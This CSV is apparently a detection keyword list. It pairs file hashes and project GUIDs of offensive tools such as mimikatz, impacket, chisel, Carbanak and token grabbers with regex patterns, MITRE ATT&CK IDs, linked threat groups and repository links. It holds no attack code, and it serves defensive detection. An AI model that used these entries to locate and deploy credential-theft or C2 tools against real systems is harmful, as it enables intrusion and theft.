"*f28955ff3d7997fbac71b4fe7c92a8b537566ace240455a312383792745c3e18*",".{0,1000}f28955ff3d7997fbac71b4fe7c92a8b537566ace240455a312383792745c3e18.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","43835" "*f28f1fbb388f56f6fda84498734d2de8487c851b6fac9866bbf27dc3852d3e41*",".{0,1000}f28f1fbb388f56f6fda84498734d2de8487c851b6fac9866bbf27dc3852d3e41.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","43836" "*f2935c9643fbbf76da73f5218cf6a8b299b4252247d81060f8d7d12f146bd69d*",".{0,1000}f2935c9643fbbf76da73f5218cf6a8b299b4252247d81060f8d7d12f146bd69d.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","43838" "*f2a64b4fce0d07eafded5c2125d7d80b*",".{0,1000}f2a64b4fce0d07eafded5c2125d7d80b.{0,1000}","offensive_tool_keyword","iodine","iodine. 
iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","43839" "*F2BA8C8961B3624BDB06DA8025CE8BB39B0375CA78CB4E52FE0259613FE6CEBD*",".{0,1000}F2BA8C8961B3624BDB06DA8025CE8BB39B0375CA78CB4E52FE0259613FE6CEBD.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","43841" "*f2c1234d05744b49749b6ef743d7a71a45d96400ec1b510531032de8312a377d*",".{0,1000}f2c1234d05744b49749b6ef743d7a71a45d96400ec1b510531032de8312a377d.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","#filehash","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","43842" 
"*f2c6184aaf6255cbac03af0f218b99f1937a892ed268c18d718546b34f2121c3*",".{0,1000}f2c6184aaf6255cbac03af0f218b99f1937a892ed268c18d718546b34f2121c3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","43843" "*f2c7d2d0539d1549c8f1a9a461b467d6ef0d4eb40c3ab8ba5412398d65a6f398*",".{0,1000}f2c7d2d0539d1549c8f1a9a461b467d6ef0d4eb40c3ab8ba5412398d65a6f398.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43844" "*f2c7d2d0539d1549c8f1a9a461b467d6ef0d4eb40c3ab8ba5412398d65a6f398*",".{0,1000}f2c7d2d0539d1549c8f1a9a461b467d6ef0d4eb40c3ab8ba5412398d65a6f398.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - 
T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","43845" "*f2ca48973b72ab97f4cb482062d2ab8778078107767a36062e11243a3265e756*",".{0,1000}f2ca48973b72ab97f4cb482062d2ab8778078107767a36062e11243a3265e756.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","43847" "*F2D38A31-CF17-4962-A601-6779F18FDBF2*",".{0,1000}F2D38A31\-CF17\-4962\-A601\-6779F18FDBF2.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","43848" "*f2d54156ad1c855eb44c874588913ed640a119b5e9399851ccbc424bd1e3ac25*",".{0,1000}f2d54156ad1c855eb44c874588913ed640a119b5e9399851ccbc424bd1e3ac25.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","43849" "*f2d93a4d4188a53285c334699b010750786a607162a498f2ff2a93d823cbf0fc*",".{0,1000}f2d93a4d4188a53285c334699b010750786a607162a498f2ff2a93d823cbf0fc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","43850" "*f2e4dc0f2862a37449a85eaa39fe3a7840822e7ae24e8999fb6401b084c9505a*",".{0,1000}f2e4dc0f2862a37449a85eaa39fe3a7840822e7ae24e8999fb6401b084c9505a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43851" "*f2ea2ded9b06880391d161ba3763f120209c6e2831e2c0092733df29e96a59a5*",".{0,1000}f2ea2ded9b06880391d161ba3763f120209c6e2831e2c0092733df29e96a59a5.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43852" "*F2EC73D1-D533-4EE4-955A-A62E306472CC*",".{0,1000}F2EC73D1\-D533\-4EE4\-955A\-A62E306472CC.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. 
Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#GUIDproject","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","43853" "*f2ee8facc06d5525d4bb73e079e8b599a0a2893351193013ba45ca311dbac50e*",".{0,1000}f2ee8facc06d5525d4bb73e079e8b599a0a2893351193013ba45ca311dbac50e.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/projectb-temp/mimidogz","1","0","#filehash","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z","43854" "*f2f1896de3273d47b9d6831b9ac66c1a8fbbde28eb433bef65495ffcb81c9105*",".{0,1000}f2f1896de3273d47b9d6831b9ac66c1a8fbbde28eb433bef65495ffcb81c9105.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","0","#filehash","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","43855" "*f2f1df5e2cb5f824bea4b8e5b936187293b9717268aec16ab4eaa8c3f35e16cb*",".{0,1000}f2f1df5e2cb5f824bea4b8e5b936187293b9717268aec16ab4eaa8c3f35e16cb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43856" "*f2f43c5e7b7af02097483d4ea3ccd1bf1cf2b6a558e334a3c4821522a5214b73*",".{0,1000}f2f43c5e7b7af02097483d4ea3ccd1bf1cf2b6a558e334a3c4821522a5214b73.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#filehash","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","43857" "*F3037587-1A3B-41F1-AA71-B026EFDB2A35*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A35.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","43865" "*F3037587-1A3B-41F1-AA71-B026EFDB2A35*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A35.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - 
T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43866" "*F3037587-1A3B-41F1-AA71-B026EFDB2A40*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A40.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","43867" "*F3037587-1A3B-41F1-AA71-B026EFDB2A40*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A40.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43868" "*F3037587-1A3B-41F1-AA71-B026EFDB2A45*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A45.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#GUIDproject","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","43869" "*F3037587-1A3B-41F1-AA71-B026EFDB2A45*",".{0,1000}F3037587\-1A3B\-41F1\-AA71\-B026EFDB2A45.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - 
T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","43870" "*f32a57e81fc9d08ca1412e932e8701a45ed35b0213c0da78bee8e65a1c6942e9*",".{0,1000}f32a57e81fc9d08ca1412e932e8701a45ed35b0213c0da78bee8e65a1c6942e9.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","43873" "*f32ec7c8c8843a5d12e2c0a9915e7616febf815ce6a9934f088ea0b2bd2fd5a0*",".{0,1000}f32ec7c8c8843a5d12e2c0a9915e7616febf815ce6a9934f088ea0b2bd2fd5a0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43874" "*f333b88f6b0f3260dd3f291b932816e055ee81fc1c94d1e5712f0848523dd706*",".{0,1000}f333b88f6b0f3260dd3f291b932816e055ee81fc1c94d1e5712f0848523dd706.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","43875" 
"*f336ca7eed8b8f05f14090f23c4cc1a67f9b7e58b61586adf5c72542b05b94be*",".{0,1000}f336ca7eed8b8f05f14090f23c4cc1a67f9b7e58b61586adf5c72542b05b94be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","43876" "*f33af2c7fab6a68954caa2271921e23eeb0e0af53370b0dcb736515bb092d8f5*",".{0,1000}f33af2c7fab6a68954caa2271921e23eeb0e0af53370b0dcb736515bb092d8f5.{0,1000}","offensive_tool_keyword","BadRentdrv2","A vulnerable driver (BYOVD) capable of terminating several EDRs and antivirus software","T1562 - T1068 - T1210 - T1489 - T1496","TA0005 - TA0004 - TA0040","N/A","Agrius","Defense Evasion","https://github.com/keowu/BadRentdrv2","1","0","#filehash","N/A","10","1","95","20","2024-12-26T13:43:18Z","2023-10-01T18:24:38Z","43879" "*f33c6af5a1f10fd4f9aa0eaa6898825b52c9ed7a7871e4912bcd03551891cb4c*",".{0,1000}f33c6af5a1f10fd4f9aa0eaa6898825b52c9ed7a7871e4912bcd03551891cb4c.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","CVE-2020-0796","10","10","N/A","N/A","N/A","N/A","43880" 
"*f34b6048a755da93e66d8335d69d98eecc76dcb4ea0e7b816dc9af12ba8b6b22*",".{0,1000}f34b6048a755da93e66d8335d69d98eecc76dcb4ea0e7b816dc9af12ba8b6b22.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","43881" "*f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1*",".{0,1000}f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","43882" "*f34befa3856ca7fedc2081903e35dff0eb86147aa6e163169355e46f8d5c3c98*",".{0,1000}f34befa3856ca7fedc2081903e35dff0eb86147aa6e163169355e46f8d5c3c98.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","43883" "*f34c21b84c272dfc122a605ee4089966bf16a2d4d4740cc9cbbd9bfc00d7090b*",".{0,1000}f34c21b84c272dfc122a605ee4089966bf16a2d4d4740cc9cbbd9bfc00d7090b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43884" 
"*F34C5DF4-22A6-49CF-901E-D6DD338061F1*",".{0,1000}F34C5DF4\-22A6\-49CF\-901E\-D6DD338061F1.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","43885" "*f35f77dc73c6960a95df7421fcddb14e8af5b769e93f56dafc47562eca566c2c*",".{0,1000}f35f77dc73c6960a95df7421fcddb14e8af5b769e93f56dafc47562eca566c2c.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","43886" "*f361e6e5c74be6d5ee9c3cf578d4855280b512ac95988f6afdcecefc917775c2*",".{0,1000}f361e6e5c74be6d5ee9c3cf578d4855280b512ac95988f6afdcecefc917775c2.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","43887" 
"*f36ae1ef8fa544943bbd65f44d53fd994b42c91042e133c69019c66e73b20278*",".{0,1000}f36ae1ef8fa544943bbd65f44d53fd994b42c91042e133c69019c66e73b20278.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","#filehash","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","43888" "*f372c2d7604f63043b3ffe8d382b6ac45a719bd125a7e7f13691eb223a8db509*",".{0,1000}f372c2d7604f63043b3ffe8d382b6ac45a719bd125a7e7f13691eb223a8db509.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","43890" "*f379a925c80b2f5959d3b3a0658895f7dad370b7478736a2957bc1ae2b59f14c*",".{0,1000}f379a925c80b2f5959d3b3a0658895f7dad370b7478736a2957bc1ae2b59f14c.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","43891" "*f37b4f47af2c937cd6ca8f380f2715c1b3fa9f97bd11d5abcac41e2e05a83c62*",".{0,1000}f37b4f47af2c937cd6ca8f380f2715c1b3fa9f97bd11d5abcac41e2e05a83c62.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","43892" 
"*f389c18921fda9ff238dccfc99ab38aa4270f677cfaa38986d642473254e3226*",".{0,1000}f389c18921fda9ff238dccfc99ab38aa4270f677cfaa38986d642473254e3226.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","43894" "*f38ff305cbb6d9d05b5285fba66bb37817e13986ec3b61acf190b9fd3d903e82*",".{0,1000}f38ff305cbb6d9d05b5285fba66bb37817e13986ec3b61acf190b9fd3d903e82.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","43895" 